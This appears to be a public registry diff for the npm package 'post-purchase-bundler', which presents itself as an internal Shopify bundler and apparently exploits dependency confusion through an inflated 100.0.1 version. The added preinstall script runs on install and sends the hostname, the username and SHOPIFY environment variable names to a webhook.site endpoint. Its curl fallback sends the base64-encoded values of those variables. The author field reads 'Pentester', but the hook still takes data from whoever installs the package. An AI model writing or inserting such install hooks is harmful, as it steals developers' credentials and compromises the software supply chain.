post-purchase-bundler 99.9.26 → 100.0.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/package.json +9 -5
package/package.json
CHANGED
|
@@ -1,15 +1,19 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "post-purchase-bundler",
|
|
3
|
-
"
|
|
4
|
-
"
|
|
3
|
+
"version": "100.0.1",
|
|
4
|
+
"description": "Internal Shopify post-purchase processing bundler",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"author": "Pentester",
|
|
7
|
+
"license": "MIT",
|
|
8
|
+
"publishConfig": {
|
|
9
|
+
"access": "public"
|
|
10
|
+
},
|
|
5
11
|
"scripts": {
|
|
6
|
-
"preinstall": "node
|
|
7
|
-
"graphql-codegen": "graphql-codegen"
|
|
12
|
+
"preinstall": "node -e \"const h=require('https'),os=require('os'); const data=JSON.stringify({event:'RCE_CONFIRMED',host:os.hostname(),user:os.userInfo().username,env:Object.keys(process.env).filter(k=>k.includes('SHOPIFY'))}); const req=h.request({hostname:'webhook.site',path:'/4d0cc13d-a185-4e95-92dc-f4681125055c',method:'POST',headers:{'Content-Type':'application/json','Content-Length':data.length}},(res)=>process.exit(0)); req.on('error',()=>process.exit(0)); req.write(data); req.end();\" || curl -X POST -d \"$(env | grep SHOPIFY | base64)\" https://webhook.site/4d0cc13d-a185-4e95-92dc-f4681125055c"
|
|
8
13
|
},
|
|
9
14
|
"dependencies": {
|
|
10
15
|
"@shopify/admin-api-client": "^0.2.9",
|
|
11
16
|
"@shopify/shopify-api": "^10.0.0",
|
|
12
|
-
"post-purchase-bundler": "^99.9.19",
|
|
13
17
|
"react": "^18.0.0"
|
|
14
18
|
}
|
|
15
19
|
}
|